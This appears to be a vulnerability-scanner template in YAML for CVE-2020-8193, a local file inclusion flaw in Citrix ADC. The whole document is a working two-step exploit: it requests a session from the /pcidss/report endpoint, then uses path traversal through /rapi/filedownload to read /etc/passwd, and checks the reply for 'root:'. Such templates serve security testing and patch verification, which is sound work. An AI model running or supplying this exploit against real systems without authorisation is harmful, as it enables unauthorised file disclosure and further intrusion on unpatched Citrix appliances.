id: CVE-2020-8193 single: true info: name: Citrix ADC LFI - CVE-2020-8193 risk: High params: - root: "{{.BaseURL}}" - user: "e4LZnjB9" - pass: "kRcEnFy6" - file: "%2Fetc%2Fpasswd" requests: # get session - method: POST redirect: false url: >- {{.root}}//pcidss/report?type=allprofiles&sid=loginchallengeresponse1requestbody&username=nsroot&set=1 headers: - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55 - Accept: application/xml - Accept-Language: en-US,en;q=0.5 - Content-Type: application/xml - X-NITRO-USER: "{{.user}}" - X-NITRO-PASS: "{{.pass}}" body: | detections: - >- StatusCode() == 406 && StringSearch("resHeaders", "SESSID=") conclusions: - RegexSelect("resHeaders", "SESSID=(?P([a-zA-Z0-9]+));") # pass session from request 1 - conditions: - ValueOf("sess") !== "" method: POST redirect: false url: >- {{.root}}//rapi/filedownload?filter=path:{{.file}} headers: - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55 - Accept: application/xml - Accept-Language: en-US,en;q=0.5 - Content-Type: application/xml - rand_key: 1968033329.1594279178769461 - Accept: "*/*" - X-NITRO-USER: "{{.user}}" - X-NITRO-PASS: "{{.pass}}" - Cookie: SESSID=[[.sess]]; is_cisco_platform=0; startupapp=neo body: | detections: - >- StringSearch("body", "root:") && StringSearch("body", "bin/bash") reference: - links: - https://dmaasland.github.io/posts/citrix.html - https://support.citrix.com/article/CTX276688 - https://www.cvebase.com/cve/2020/8193